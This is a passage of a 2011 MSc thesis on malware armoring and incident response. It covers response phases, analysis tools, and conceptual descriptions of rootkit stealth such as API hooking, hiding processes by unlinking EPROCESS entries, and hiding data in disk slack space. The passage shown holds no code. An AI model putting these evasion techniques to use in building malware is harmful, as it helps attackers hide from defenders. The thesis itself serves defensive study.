Malware Armoring: the Case Against Incident Related Binary Analysis

Malware Armoring: The case against incident related binary analysis

Author Name: Steve Hendrikse

Date: February 2011

Supervisor: John Austen

Registration Number (SRN): 060352033

Submitted as part of the requirements for the award of the MSc in Information Security of the University of London

Table of Contents List of Figures ...... 4 1. Executive Summary ...... 8 2. Introduction ...... 9 3. Incident Response ...... 10 3.1. Introduction ...... 10 3.2. Preparation ...... 11 3.3. Identification ...... 16 3.4. Containment ...... 22 3.5. Eradication ...... 28 3.6. Recovery ...... 29 3.7. Lessons Learned ...... 29 3.8. Conclusion ...... 30 4. Armoring Techniques ...... 30 4.1. Introduction ...... 30 4.2. Encoding ...... 32 4.2.1. String Encoding ...... 32 4.2.2. Payload Encoding (Encryption) ...... 33 4.2.3. Executable packing ...... 35 4.3. Virtual Machine Environment (VME) Detection ...... 39 4.4. Run-time decryption ...... 42 4.5. Polymorphism and Metamorphism ...... 45 4.6. Anti-Debugging ...... 48 4.6.1. API Based Detection ...... 49 4.6.2. Process and Thread Block Detection ...... 49 4.6.3. Hardware and Register Based Detection...... 50 4.6.4. Exception Based Detection ...... 52 4.6.5. Timing Based Detection ...... 53

4.6.6. Modified Code Based Detection ...... 54 4.7. Multi-partite ...... 54 4.8. Conclusions ...... 56 5. Case Study ...... 56 5.1. Introduction ...... 56 5.2. Preparation ...... 57 5.3. Identification ...... 57 5.4. Containment ...... 57 5.5. Eradication ...... 66 5.6. Recovery ...... 66 5.7. Lessons Learned ...... 67 5.8. Conclusions ...... 67 6. Conclusions ...... 68 7. Bibliography ...... 70 Appendix A – Glossary ...... 77 Appendix B – Case study findings ...... 78 From investigation of malware that is known not to be armored ...... 78 From investigation of malware that is known not to be armored ...... 95 Appendix C – Case study Rootkit source code ...... 131 Appendix D – Creation of infection ShellCode ...... 133

List of Figures Figure 1 - Function Hooking (Scambray & McClure, 2008) ...... 19

Figure 2 - Process Hiding (Scambray & McClure, 2008) ...... 20

Figure 3 - Registry (Scambray & McClure, 2008) ...... 20

Figure 4 - NTFS Layout (SANS, 2006) ...... 22

Figure 5 - 3 Interconnected Phases of Analysis (Zeltser, 2010) ...... 23

Figure 6 - Behavioural Analysis (Aquilina, Casey, & Malin, 2008) ...... 24

Figure 7 - Binary and Code Analysis (Aquilina, Casey, & Malin, 2008) ...... 25

Figure 8 - Memory Analysis (Aquilina, Casey, & Malin, 2008) ...... 27

Figure 9 - String encoding/replacement ...... 33

Figure 10 - Payload Encoding ...... 34

Figure 11 - PE File Layout (Pietrek, 1994) ...... 35

Figure 12 - IMAGE_OPTIONAL_HEADER (Websense) ...... 36

Figure 13 - IMAGE_SECTION_HEADER (Websense) ...... 37

Figure 14 - Redpill VME detection routine (Rutkowska, 2004) ...... 40

Figure 15 - LDTR, GDT based VME detection (Klein, 2010) ...... 40

Figure 16 - Packer and Cypter Comparison (Aquilina, Casey, & Malin, 2008) ...... 43

Figure 17 - Runtime Decryption - Executable View (Oreans Technologies, 2008) ...... 43

Figure 18 - Crypter with armoring options (xinfiltrate) ...... 44

Figure 19 - Anatomy of Metamorphic Engine (Walenstein, Mathur, Chouchane, & Lakhoti, 2007) ...... 45

Figure 20 - Insertion of garbage instructions (Al Daoud, Jebril, & Zaqaibeh, 2008) ...... 46

Figure 21 - Common Garbage (or junk) Instructions (Orr, 2006) ...... 46

Figure 22 - Breakdown of Metamorphic Malware (Driller, 2002) (Hosmer, 2008) ...... 47

Figure 23 - isDebuggerPresent API use (Veracode, 2008) ...... 49

Figure 24 - Query PEB directly (Veracode, 2008) ...... 50

Figure 25 - Using Stack Segment to protect TRAP Flag (Falliere, 2007) ...... 51

Figure 26 - Checking for use of Debug Registers (Veracode, 2008) ...... 51

Figure 27 - Chaining of Handlers (Jackson, 2008) (Bania) ...... 52

Figure 28 - Use of Exception Handling to identify debugger (Veracode, 2008) ...... 53

Figure 29 - – Use of Timing sequence to identify debugger (Veracode, 2008) (Bania) ...... 54

Figure 30 - Identification of offending file ...... 58

Figure 31 - Using a system delta tool ...... 58

Figure 32 - Using SysAnalyzer to analyze the malware...... 59

Figure 33 – Exploit findings from Sysanalyzer ...... 59

Figure 34 - View of strings within the malware ...... 60

Figure 35 – Human readable output from network packet capture ...... 61

Figure 36 – View of disassembled code and execution tree ...... 62

Figure 37 – Error message resulting from load into debugger ...... 63

Figure 38 - Process terminated once in debugger ...... 63

Figure 39 – View of strings within the in-memory process ...... 63

Figure 40 – Overlaid view of malware traffic (ASCII printable and TCP stream reassembled) ...... 64

Figure 41 – View of keylogger.dat contents ...... 64

Figure 42 - Finding OEP using Ollydump ...... 65

Figure 43 - Reconstructing an IAT without OEP ...... 65

Figure 44 – Full output of Inctrl5 ...... 79

Figure 45 – Full output of SysAnalyzer ...... 87

Figure 46 – Full output of ngrep session ...... 94

Figure 47 – Full output of Inctrl5 ...... 97

Figure 48 – Full output of SysAnalyzer ...... 102

Figure 49 – Full output of Volatility analysis ...... 130

Figure 50 – main.c ...... 131

Figure 51 – install_as_persistent.c ...... 131

Figure 52 – version.c ...... 131

Figure 53 – systeminfo.c ...... 131

Figure 54 – create_sock.c ...... 131

Figure 55 – download.c ...... 131

Figure 56 – getnick.c ...... 131

Figure 57 – http_readline.c ...... 131

Figure 58 – randfilename.c ...... 131

Figure 59 – getRandomPIN.c...... 131

Figure 60 – encoding.c ...... 131

Figure 61 – debuggerdetect.c ...... 131

Figure 62 – killprocess.c ...... 131

Figure 63 – listprocesses.c ...... 131

Figure 64 – keylogger.c ...... 131

Figure 65 – keylogcontrol.c ...... 131

Figure 66 – uploadkeylog.c ...... 131

Figure 67 – update.c ...... 132

Figure 68 – scanhost.c ...... 132

Figure 69 – sleep.c ...... 132

Figure 70 – vmdetect.c...... 132

Figure 71 – ms03_026.c ...... 132

Figure 72 – ms04_011.c ...... 132

Figure 73 – main.h ...... 132

Figure 74 – version.h ...... 132

Figure 75 – textstrings.h ...... 132

1. Executive Summary

Given the ever-increasing complexity of malware due to armoring techniques, many commercial enterprises should carefully consider whether comprehensive analysis of discovered malware is worth the effort required to uncover actionable findings. While two of the most important steps in the incident response process for malware are to (1) understand the breadth of an attack and (2) the impact of the attack, this report will show how the advances in malware armoring have introduced features that actively detract the analyst away from deciphering the true nature and intent of the malware. Armoring techniques are a group of custom developed software modules that are implemented solely for the purpose of hiding malware capabilities and thwarting analysis by the authorities. Effective incident response should rather focus on early detection and identification of threats, with a secondary focus on being able to respond quickly with some automated containment and eradication method (typically a vendor supplied cleaning tool). This change in focus will ensure that the impact of a successful infection is minimized and that the likelihood of an unidentified infection is reduced.

This paper describes the phases, tools, and procedures that make up a typical incident response plan. To start, details about the steps of that make up current malware analysis processes will be given. Next, armoring techniques used by the malware writers to thwart this analysis will be covered, followed by a case study designed to demonstrate the effectiveness of current analysis techniques given the armoring tactics in use today. Throughout this paper, special attention will be given to identify alternative strategies that could be used by the malware analyst in the ongoing fight against malware. 8

2. Introduction

Given the ever-increasing complexity of malware due to armoring techniques, most commercial enterprises should carefully consider whether or not to undertake comprehensive analysis of a malware sample collected as part of a security incident. While an important step in the incident response process is to understand the breadth of an intrusion and its impact to the organization, this report will show how the advances in malware armoring have made it virtually impossible to decipher the true nature and intent of the malware; and that effective incident response should focus on 1) early detection and identification of threats and then 2) timely and effective response with some automated eradication method (typically an vendor supplied cleaning script).

This report will walk through the incident response process, outlining the milestones and phases involved in the process. Included in the discussion of the phases of the incident response process will be a detailed look at an "industry best practice" response for incidents of type malware infection or infestation. The processes, procedures, and tools that make up this “industry best practice” come from documentation supplied by experts in the field and from experiences gained doing binary analysis of 50 randomly chosen malware samples collected from websites and low-interaction honey pots over the last year.

A detailed examination of each of the leading armoring techniques will show how advances in armoring reduce the chances of successful analysis. After describing the armoring technique and how it is implemented, a discussion of the rationale and reward for using the technique will be presented. Any advances that can be accommodated by the investigating analyst to reduce the effectiveness of the armoring will also be presented.

Finally, this report will conclude with a case study, comparing an example of a non-armored binary to an armored binary through the stages described in the incident response process. This case study will demonstrate that the effort required to complete a comprehensive binary analysis of a piece of malware simply isn't justified given the returns on the analysis. It will be shown that the greatest efforts in responding to malware threats should be spent in strengthening the detection systems and ensuring that the tools used in the eradication stage are effective and timely as well as covering the full breadth of the organization’s computing landscape.

3. Incident Response

3.1. Introduction Computer Security Incident Response is typically made up of a number of interconnected phases. These phases often form a circle where the output of each phase is fed as input into the next phase and the output of the final phase is taken as input to the first phase. The phases of the incident response process are:

1) Preparation 2) Identification 3) Containment 4) Eradication 5) Recovery 6) Lessons Learned (SANS, 2006)

Each of the phases presented above will be discussed in the following sections, but the focus of each section will be on covering the typical response processes, procedures, tools, and techniques in use when dealing with a malware infection and other malicious software infestations.

The purpose for having an incident response process is to:

1) Quantify and qualify the impact of the incident 2) Effectively identify the threat for timely and complete removal 3) Identify weaker areas of control that require additional protection from the threat landscape

The first, and, in a commercial enterprise, the most important, reason for having an active incident response process for malware infestations is to understand the impact of the infestation. At best, a complete listing of all the systems and data that the malware was in contacted with will allow for identification of leaked or compromised intellectual property. This best case scenario is not often realized, so the investigators must investigate, going from lead to lead, identifying areas that the infestation has touched. By cross referencing the data available from the systems and the systems impacted by the malware, conclusions can be made about the impact of the intrusion.

The incident response process is also responsible for accurately identifying the threat and its propagation methods, thus allowing for quick and effective cleaning and recovery of the corporate network. If the threat has not been accurately identified, or if the threat has taken an extended amount of time to characterize, unnecessary damage, in the form of additional data loss or cost of remediation effort, may be realized.

Finally, the organization must understand how the threat was able to bypass existing controls to gain a foothold in the corporate environment. The bypass may have resulted from weak technical controls, weak policy, or weak user awareness and training. Once these areas of weakness are identified, they can be fed back into the incident response process as opportunities for improvement. The opportunities for improvement may involve any of the technology controls, policy controls, or user training and awareness.

3.2. Preparation The first phase in any incident response process is the “Preparation” phase. This is the phase whereby all of the needed policies, processes, tools, procedures, and templates are defined and collected into an incident response plan.

Every commercial organization will have an information security policy statement. An information security policy statement expresses management’s commitment to the implementation, maintenance, and improvement of its information security management system. An information security management system (ISMS) includes all of the policies, procedures, plans, processes, practices, roles, responsibilities, resources, and structures that are used to protect and preserve information. It includes all of the elements that organizations use to manage and control their information security risks (Praxiom Research Group Ltd, 2009).

The ISMS is especially useful as it will assist in the identification of features and functionality required by the compensating controls. The policies will also assist in defining the:

1) Assets most valuable to the organization, 2) Risk aversion of the organization, and 3) Expectations of recovery after an event or incident.

Properly defined response strategies must be defined prior to an incident being raised so that every responder in the organization will react in an organized and consistent fashion. There can be a wide 11

variation in the response to a malware incident. If the number of infected machines is low, or if the spread of machines is slow (in both cases thresholds will need to be defined by the organization), the response may simply be to allow the automated identification and cleaning system (typically an Anti- Virus solution) to control the containment and eradication. However, if the number of machines is high, or if the number of infected machines is growing at a dramatic pace, additional effort may be placed on the response. In either case, it is critically important to be able to identify the threat in a consistent, accurate, and timely fashion.

These response strategies will also define the members of the response team. Depending on the organization’s requirements for response, this team may be made up of members from the following teams (which cross all boundaries of the organization):

1) Public Relations 2) Product Management (in terms of online ownership) 3) Human Resources 4) Legal 5) Information Security 6) Information Technology

Each of these teams will bring their individual capabilities and perspective into the proper handling of the incident. Public Relations and Product Management will be focused on liaising with external customer and partners of the organization under incident. It is their focus to ensure that these important partners are aware of the incident, and have a good understanding of the measures being taken by the organization to contain the incident. Human Resources and Legal will be focused on the internal aspects of the organization’s response, ensuring that the organization’s best interests are maintained with respect to its staff, its intellectual property, and any legislative action resulting from the incident. Finally, the information security and information technology teams will be focused on quantifying the impact of the incident and eradicating the malware from the environment, respectively. According to the National Institute of Standards and Technology, an incident response team (or CSIRT, computer security incident response team) services can be grouped into three categories: 1) “Reactive services. These services are triggered by an event or request, such as a report of a compromised host, wide-spreading malicious code, software vulnerability, or something that was identified by an intrusion detection or logging system. Reactive services are the core component of CSIRT work. 12

2) Proactive services. These services provide assistance and information to help prepare, protect, and secure constituent systems in anticipation of attacks, problems, or events. Performance of these services will directly reduce the number of incidents in the future. 3) Security quality management services. These services augment existing and well established services that are independent of incident handling and traditionally performed by other areas of an organization such as the IT, audit, or training departments. If the CSIRT performs or assists with these services, the CSIRT’s point of view and expertise can provide insight to help improve the overall security of the organization and identify risks, threats, and system weaknesses. These services are generally proactive but contribute indirectly to reducing the number of incidents”. (West-Brown, Stikvoort, Kossakowski, Killcrece, Ruefle, & Zajicek, 2003)

When dealing with malware infections, the reactive services category is the category that becomes the most prevalent, capitalizing on the time and resources of the response teams. The following tasks take up the majority of time and effort when responding to a malware incident as they relate most closely to understanding the impact of the attack and how to eradicate the malware from the environment: 1) “Forensic evidence collection: the collection, preservation, documentation, and analysis of evidence from a compromised computer system to determine changes to the system and to assist in the reconstruction of events leading to the compromise. This gathering of information and evidence must be done in a way that documents a provable chain of custody that is admissible in a court of law under the rules of evidence. Tasks involved in forensic evidence collection include (but are not limited to) making a bit-image copy of the affected system’s hard drive; checking for changes to the system such as new programs, files, services, and users; looking at running processes and open ports; and checking for Trojan horse programs and toolkits. CSIRT staff performing this function may also have to be prepared to act as expert witnesses in court proceedings. 2) Tracking or tracing: the tracing of the origins of an intruder or identifying systems to which the intruder had access. This activity might involve tracking or tracing how the intruder entered the affected systems and related networks, which systems were used to gain access, where the attack originated, and what other systems and networks were used as part of the attack. It might also involve trying to determine the identity of the intruder. This work might be done alone but usually involves working with law enforcement personnel, Internet service providers, or other involved organizations.” (West-Brown, Stikvoort, Kossakowski, Killcrece, Ruefle, & Zajicek, 2003) 13

The processes and procedures required for effective response and analysis of malware executables should be developed and tested prior to an actual incident. In this way, the analysts have experience using the tools and can recognize valid or expected outputs from the tools. The actual procedures used in the analysis of an unknown executable are covered in detail in the containment section (Section 3.4).

The tools required for malware analysis can be classified into 4 families. The families are:

1) file identification and manipulation tools, 2) system delta tools, 3) system activity monitoring tools, and 4) file deconstruction tools.

The first family of tools, file identification and manipulation tools are used to identify the malicious executable and extract any quick wins in the analysis process. To begin, Openports (Diamond Computer Systems Pty., 2005), and other similar tools, will assist in identifying which file on the disk is connected to which process running in memory. It is often straightforward to identify which computer in an enterprise network is transacting inappropriate network communication, but refining the search down to a file on disk can be challenging. Once the malicious file is identified, a tool like strings (Russinovich, Strings v2.41, 2009) will extract all of the ASCII strings found within the suspected file. These strings are often helpful during the process of analyzing the malicious file as these strings may identify Command and Control (C&C) commands, destination IP addresses, C&C credentials, or error messages embedded within functions inside the malware file. With increasing regularity though, malicious file authors are obfuscating their executables using packing functions. The details of executable packing are covered in the armoring section of the report (Section 4.2.3), but one of the result of packing is the obfuscation of ASCII strings. Tools like PEid (Jibz, Qwerton, snaker, & xineohP, 2007) will analyze the structure of the malicious file and report back on the packing method used (if previously defined) and the file section details. Finally, tools like PE.explorer (HeavenTools Software, 2011), can dissect an executable file and identify embedded resources, required libraries, and other system specific hints that will aid in the determination of the potential impact of the malware.

Once the suspected file is identified, and a number of preliminary findings are possibly observed, the analysis will likely change tactics and attempt to run the malware in a controlled environment that is equipped with a number of monitoring systems. A primary goal of this phase of the investigation is to understand how the victim computer is changed by the infection. System delta tools, like Inctrl5 (PC

Magazine, 2000) or Sysanalyzer (iDefense Labs, 2011) will build a baseline of the current system settings and configuration. Once the baseline is created, the suspected malware sample is executed and allowed to run as designed. After some period of time, the delta tool is re-run and the system configuration is once again collected. The delta tool then compares the new configuration with the original baseline collected prior to the execution of the malware. Assuming that the analyst did not allow any other system updates to occur during the infection process, all changes to the system configuration will have been made by the malicious executable. The information gathered with the use of this tool will be added to the information collected by the file identification tools to continue to add detail and context to the scenario being built by the analysis process.

In addition to understanding how the system configuration has changed due to the infection of the computer by the malware, the analyst will also want to understand how the malicious process, started by the malicious file, is interacting with the local computer as well as the networked systems that are connected to the infected computer. Tools like Regmon, Filemon, and Procmon (Russinovich, Sysinternals Suite, 2011) monitor and report on current activity in the Registry, file system, and running process table, respectively. Windump (Cace Technologies, 2006), ngrep (Ritter, 2006), and others like them monitor and display networked destinations and the traffic between them. Lastly, tools like SpyStudio (Nektra Advanced Computing, 2009) and DDESpy (Microsoft, 2010) monitor calls being made to the foundational Windows libraries and display the library and function name as the function is being called from within the malicious executable.

Typically, the behavioural analysis completed to this point has been accomplished using systems that have been virtualized in some Virtual Machine Environment (VME), like VMware (VMware Inc, 2011), VirtualPC (Microsoft, 2011), or Xen (Xen.org, 2011). These virtualized environments allow for simple isolation of machines, quick return to known configurations (using image and memory snapshots), and the ability to connect monitoring software to internal aspects of the system. However, malware authors have recognized that analysis takes place in virtualized environments, and have developed armoring techniques to counteract virtual machine technology (Section 4.3). In this way, even after the malicious executable has been identified or observed, including how the executable interacts with the infected computers and others connected to it, it is often necessary to decompose the executable into a set of human readable instructions to gain the required level of understanding of the potential impacts of the infection. Assuming the executable has been packed by some known packer, a comprehensive unPacker, like GUNpacker ([email protected], 2010), can be used to return the packed

executable into a form that can be decomposed into the required set of human readable instructions. Again, with increasing regularity, malicious executables are packed using proprietary algorithms, or packed using an encryption algorithm. In these cases, the generic unPacker will fail. As an alternative, a debugging tool like Ollydbg (Yuschuk, 2010) (and complimentary scripts like Ollydump (Gigapede, 2011)) can be used to pull the executable out of memory. However, due to the in-memory organization of Portable Executable (PE) based processes, additional tools like LordPE (y0da, 2009) and ImpREC (MackT, 2008) are required to rebuild the dumped memory into a working executable file. In some cases advanced tools like Nigilant32 (Agile Risk Management LLC, 2011) or Volatility (Volatile Systems, LLC , 2008) will be required to dump the entire contents of memory to a file, and then extract the process image from the dump. Once the executable has been reconstructed, a disassembler, such as IDA Pro (Hex-Rays SA , 2011) can be used to complete the analysis of the executable.

Mastery, even proficiency, of all the tools in each of these families can take a significant investment in time and energy. For this reason each tool should be properly documented, its use case and expected outcomes should be clearly known in order to reduce both false findings or missed evidence. A false finding may lead the analyst to pursue a line of examination that has no bearing on the actual impact of the malware. This incorrect line of examination also may lead the examiner to miss certain key pieces of evidence that might fully expose the true nature and intent of the malicious file. It is considered best practice to duplicate the findings of a step in the analysis with another tool known to produce similar outcomes, and to document the procedures and findings to allow an alternate examiner to reproduce any findings that are discovered by the primary examiner.

The required security policies are created in this phase, but in order for the security policies to be enforced, and for the incident response team’s ability to monitor for these breaches in the policies, all of the compensating controls ought to have a component of monitoring built in. It is with the ability to detect these breaches that the organization can move to the next phase of the process.

3.3. Identification Once all of the policies are written, compensating controls implemented, and the staff is trained, the next phase of the incident response process begins. The goal of the identification phase is to gather events, analyze them, and determine whether we have an incident (SANS, 2006). According to the SANS Institute, identification can occur at 3 levels: network perimeter, host perimeter (host networking, host firewall, HIPS), and system level (A/V, file integrity, etc) (SANS, 2006). Events identified at the furthest

edge of the network have the best hope of being stopped prior to any damage being done as events are still far away from the core of the network (where the most sensitive of data is stored). However, following the “Defense in Depth” (Perrin, 2008) mantra, the goal of monitoring is to identify the event at each of the 3 levels.

As discussed in the Preparation phase, there are many technologies available to assist in the identification of a malware infection. Some examples of technologies that can be used to identify a host based malware infection include:

1. Network Intrusion Detection System 2. Network Flow and Anomaly Detection 3. Network Content Filtering and Scanning (e.g. mail-flow scanning) 4. Network Firewall logs (blocked packets to malicious websites) 5. Host Intrusion Prevention System 6. Host Anti-Virus logs

Network Intrusion Detection Systems (IDS) are systems that are placed on the network, in promiscuous mode, in order to read all network packets, regardless of the packet’s destination. Once a packet is read, the IDS will compare the collected packet to the set of known malicious data signatures that have been previously defined. If a match between the read traffic and stored signature is found, an alert is raised.

Similar to IDS, Network Flow and Anomaly Detection (NetFlow) systems sit on the network, also in promiscuous mode, and capture all network traffic. Unlike IDS systems where the captured traffic is compared to a set of previously defined signatures, the NetFlow system builds a model of normal traffic patterns over time. After the traffic model is built, and has had sufficient time to build some level of confidence in the accuracy of the model, the Anomaly system compares the current traffic to the model. Should the current traffic differ greatly from the traffic mode, an alert is raised.

Network Content Filtering is again similar to IDS, but relies on matching application level, typically World Wide Web (WWW), traffic. As well, where WWW traffic is concerned, the Network Content Filtering engine categorizes any WWW destinations into named categories that are either allowed or blocked, based on the policy implemented in the device by the organization.

A perimeter firewall acts like a traffic director, allowing some traffic to pass and blocking other traffic. Typically, a “white- list” style of access is implemented whereby only known good traffic is allowed to enter or exit the perimeter of the network. With each allow or block, an audit log entry is created containing a timestamp, origin address and port, destination address and port, and action taken.

Host-based Intrusion Detection Systems (HIDS) and Anti-Virus Systems (AV) are both installed on the local systems and often serve as the last line of defense against malware threats. The HIDS incorporates a combination of network based signatures and program execution signatures that are compared to the current activity on the system. If a match is encountered, an alert is raised and the activity is blocked. Similarly, if a previously defined AV signature is matched by either a process or file on the protected computer, an alert is raised and some response action is taken (clean, quarantine, block).

All of the technologies described above contribute to the capability to quickly and accurately identify a networked host that appears to be infected by some malicious software. In many cases, there will be multiple, simultaneous alerts created for an infected host. These multiple alerts increase the likelihood of a true positive, while reducing the likelihood of a false positive. Due to the potential damage that could result, every event, regardless of how many simultaneous alerts are identified, should be responded to in order to reduce the chance of a missed true positive reading.

Once a suspicious host has been identified, the search for the malicious executable begins. In order to locate the malicious file, the following types of tools, from the family of “system activity monitoring tools” should be used on the suspicious host:

1) Those that identify inconsistencies between high level (API) calls and low level (direct) calls 2) Those that identify processes in “run”able state that aren’t shown in the task list 3) Those that identify registry anomalies or inconsistencies 4) Those that identify hidden (both allocated and not) sections of disk 5) Those that identify non-standard network port use or activity

Malicious executables often will try to evade detection by inserting small stub routines into the running system that allow evidence of malicious activity to be hidden. These stub routines work by changing API results so that a system view using an API is different than from the actual view in storage (Microsoft, 2006). The process of inserting these small stub programs that intercept legitimate calls is known as hooking, and is depicted in Figure 1. In Figure 1, process.exe expects

IMPORTED.DLL!ImportedLibraryFunction1() to reach ImportedLibraryFunction1() within IMPORTED.DLL without having to pass through ROOTKIT.DLL first.

Figure 1 - Function Hooking (Scambray & McClure, 2008)

A tool like RootKitRevealer can identify these inconsistencies because it compares the results of a system scan at the highest level with that at the lowest level. The highest level is the Windows API and the lowest level is the raw contents of a file system volume or Registry hive (a hive file is the Registry's on-disk storage format). (Microsoft, 2006) Thus, this tool can identify systems that have been compromised and aid in the determination of the origin of the infection.

In User-mode, processes in Windows are backed by a kernel-mode object known as executive process (EPROCESS) blocks. This EPROCESS block is a memory based structure that contains information about each running process. These EPROCESS blocks are connected in a doubly linked list; with each EPROCESS block having a pointer to the next and previous EPROCESS block (Scambray & McClure, 2008). For most Windows utilities (especially TaskMgr), this doubly linked list of EPROCESS blocks is the source for process information. However, the Windows Scheduler does not use this list for the actual scheduling of CPU cycle time. Thus, as shown in Figure 2, an EPROCESS block can be orphaned (the links of the previous and next EPROCESS blocks updated to bypass current EPROCESS block) and still remain running on the CPU. This mechanism of orphaning EPROCESS blocks enables a piece of malicious code to continue running on a computer while not showing up in the task list. Checking for inappropriate or out-of-place processes by consulting the task list is one of the primary steps in the malware incident response step.

Figure 2 - Process Hiding (Scambray & McClure, 2008)

In Windows based operating systems, the Registry is one of the key locations for storing configuration and system information. Due to the complexity of most Windows installations, and Microsoft’s desire to maintain backward compatibility from previous version of Windows, the Registry can easily hide settings introduced by malicious software. As shown in Figure 3, there are tools available that assist in analyzing and identifying potentially undesired settings within the Registry.

Figure 3 - Registry (Scambray & McClure, 2008)

In addition to being able to surreptitiously store information in the Registry, the NTFS file system can also be used to hide information. Modern malware will hide itself in any or all of:

1) The Windows system subdirectories

2) The Boot Sector 3) File Slack Space 4) Unallocated Space 5) Host Protected Area

Modern versions of Windows are made up of hundreds of files, with many different types of extensions. These files are regularly updated and replaced when a service pack or patch is applied. Experience has shown that a well-crafted file name, made similar to a legitimate Windows file name, will escape detection for a considerably long time. Detection will only occur after an A/V signature has been created that either matches on the file hash or a sequence of bytes within the malicious file itself.

As shown in Figure 4, the system disk in a Windows system is divided into a number of equally chunks, called sectors. The boot sector is the area of disk that holds the code that boot straps the computer with the initial libraries to get Windows up and running. Files, including those that make up the Windows Operating System are stored within the disk sectors following the boot sector. Each of the files takes up as many sectors as required to contain the whole file, regularly leaving some amount of storage within the last sector available. This storage, available within the last sector allocated to the data file is known as slack space. Malware is able to identify these unused sections of disk and will often store information (for example key log data) in these areas. The area of the disk that has not been formatted by the operating system for use with file storage is called the unallocated space. Malware will often store data in this area as well, typically starting at the end of the disk and working toward the front of the disk, in an effort to maintain the storage as long as possible.

Figure 4 - NTFS Layout (SANS, 2006)

The last type of tool required for the identification and analysis of malware are those that are able to observe, intercept, or manipulate network communications. Once atypical or malicious/unwanted network communication has been identified, these network analysis tools will be used to identify the in- memory process that is driving the communication. Once the in- memory process is known the executable file on disk can be identified and extracted.

At this point in the identification phase, a clear and present threat has been identified and is in the form of some unauthorized process that was started by a file stored on a storage medium attached to one (or more) of the organizations computers.

3.4. Containment With the confirmed identification of an executable file spawning a malicious process on the computer, the incident response process moves into the Containment phase. The primary goal of this phase is to keep the problem from getting worse (SANS, 2006) . In the commercial enterprise, this goal is likely to be realized as the collection and delivery of a specimen copy of the malicious executable file to the business partner responsible for creating an A/V signature. This will allow the partner with specialist knowledge of characterizing and cleaning malware samples to deliver a signature for use in widespread detection and automated response (either by cleaning or quarantining). Once the specimen has been sent to the A/V partner, short term containment efforts will be undertaken, which may include installing a network ACL to disallow any in- or out- bound network traffic from the host, the blocking of certain executables, or disconnection of infected machines from the corporate network. In order to preserve evidence, adding an “all traffic block” ACL on the network port of the infected machine is most effective.

This response ensures that the system state is not altered, and that any memory resident data is left intact.

In a comprehensive analysis of an unknown binary, there are 3 interrelated phases: behavioural, binary and code, and memory (Zeltser, 3 Phases of Malware Analysis: Behavioral, Code, and Memory Forensics, 2010). The analysis of a particular malware specimen can start at any of the 3 phases, but typically it starts at the behavioural phase. The behavioural phase requires the least amount of specialist computer skill as this phase deals primarily with observing the malware in action. However, as depicted in Figure 5, the analysis doesn’t normally progress serially from one to another, rather, each of the three stages are completed in a lock step fashion, where steps of each phase will provide useful data and context to the other phases.

Figure 5 - 3 Interconnected Phases of Analysis (Zeltser, 2010)

In the behavioural analysis process, a common approach is to bring up a virtual image of a clean operating system install via one of the available Virtual Machine Environments (VME). This phase of the analysis process is depicted in Figure 6. The goal of this phase of the analysis is to discover how the suspected malware interacts with the network, file system, and system state resources of the infected

Figure 6 - Behavioural Analysis (Aquilina, Casey, & Malin, 2008)

computer. The analyst observes and documents the various aspects of the malware’s interaction with the system, hoping to understand the underlying goal of the malware. Each observed fact is recorded and used in the other phases to identify additional pieces of information about the malware. In addition to using the gained data for the other phases, this data is used to develop customized routines for network- and host- based monitoring systems, host- based cleaning routines, and perimeter network controls.

The Binary and Code Analysis phase, shown in Figure 7, concerns itself with the binary file and aspects of the program that are made known via deconstruction of the executable file itself. The first step of this analysis is to determine if the file has been packed or encrypted by some known algorithm. If the file has not been packed, extraction of ASCII strings is the best first step. Often C&C commands, username/ password pairs, and control server IP addresses can quickly be extracted. Following these string extractions, identifying the libraries and other dependencies will add context and richness to the picture being developed of the Figure 7 - Binary and Code Analysis (Aquilina, Casey, & Malin, 2008)

malware’s capabilities. Finally, the file can be opened in a disassembler like IDApro to trace through all of the steps of the executable. Using a disassembler allows the analyst to peer into every capability stored within the binary file but requires considerable investments in time and technical capability of the analyst.

With increasing regularity, malicious files are armored using techniques described in Section 4, which inhibit the analyst’s ability to extract meaningful impact or damage evidence from the running executable within the virtual environment. Armoring also inhibits extracting any data from the file itself or disassembling the file. In these cases, the third and final aspect of binary analysis must be done, memory analysis (Figure 8).

Memory analysis starts by opening the malicious executable inside of a debugger program. Once loaded into the debugger, the analyst can step into, or over, every instruction. This fine-grained control allows the analyst to bypass sections of code that might normally impact the analyst’s ability to complete the analysis. However, this manual stepping through the executable is time consuming. As a compromise between the control of single stepping through the program and the time required to step through the entire application, breakpoints can be applied which allow the program to run without interruption until the next breakpoint is reached. The analyst will be required to step though the entire executable, using breakpoints as appropriate, disabling all of the armoring and anti-forensic routines encountered in the executable. Once the analyst has bypassed all the protections within the binary, the in- memory process can be dumped to disk. Tools exist to rebuild the Import table and other required sections of the Portable Executable (PE) file format (see Section 4.2.3 for explanation of Portable Executable File Format). Once the file has been recreated in an unpacked or decrypted format, the analysis can continue as before.

There are armoring techniques that are designed to resist these efforts in reverse engineering by using a debugger that will inhibit the recreation of the executable in an unpacked/decrypted fashion. In these cases, the final option is to extract all required data about the executable directly from the memory used by the running process. Tools like Volatility or Nigilant32 can be used to extract images from memory dumps, but the technology for doing these extractions is still in its infancy and useable results aren’t always achieved.

The challenge inherent in every phase of the malicious binary analysis process is that decisions made based on the outcomes of the analysis could be incorrect or ineffective due to erroneous conclusions

drawn as a result of incorrect analysis. Without some degree of specialist knowledge, advanced analysis techniques like those described in the “binary and code analysis” or “memory analysis” phase could result in continued infection by the malware, flawed monitoring and/or detection routines, and ineffective system cleaning routines.

As mitigation to the potential damage done by faulty in-house analysis, it is often considered good practice to have the organization’s A/V partner receive a copy of the suspect binary for purposes of developing detection and cleaning routines that are compatible with the existing A/V infrastructure. In this way, containment is split between internal resources working towards identifying the impact of the infection and the external A/V partner working on the development of material required to rid the organization of the malware.

Figure 8 - Memory Analysis (Aquilina, Casey, & Malin, 2008)

3.5. Eradication The goal of the eradication phase is to get rid of the attacker’s artifacts on the machine, including accounts, malicious code, pirated software, pornographic material, or anything else the malicious actor has left on the machine (SANS, 2006). Once the malware has been identified and analyzed, compensating controls can be applied to remove the threat of re-infection and/or spread of the infection. These compensating controls can involve (but are not limited to):

1) Applying updated virus signature (includes both detection and cleaning) 2) Patching vulnerable systems 3) Strengthening existing security controls (i.e. change passwords, modify system configurations, implement network access controls) 4) Implementing threat specific monitoring routines

